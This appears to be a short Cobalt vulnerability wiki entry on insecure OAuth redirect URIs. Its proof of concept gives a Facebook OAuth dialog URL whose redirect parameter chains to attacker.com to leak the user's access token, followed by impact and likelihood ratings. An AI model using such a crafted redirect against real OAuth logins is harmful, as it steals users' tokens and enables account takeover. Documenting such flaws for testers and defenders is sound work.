Cobalt Crowdsourced Application PentestCobalt Crowdsourced Application PentestCobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V4 - Access Control

OAuth Insecure Redirect URI

POC

1.) Sign-in to a Facebook linked account. 2.) Visit: https://www.facebook.com/v2.8/dialog/oauth?appid=xxxx&clientid=xxxxx&display=popup&domain=xxxxxx&e2e=%7B%7D&locale=enUS&origin=1&redirecturi=xxxxx/login?nextaction=//attacker.com&responsetype=token&scope=publicprofile%2Cemail&sdk=joey&version=v2.8 3.) You'll be redirected to attacker.com and your accesstoken will be leaked.

Impact

Medium-High (depends on information disclosure)

Likelihood

Medium-High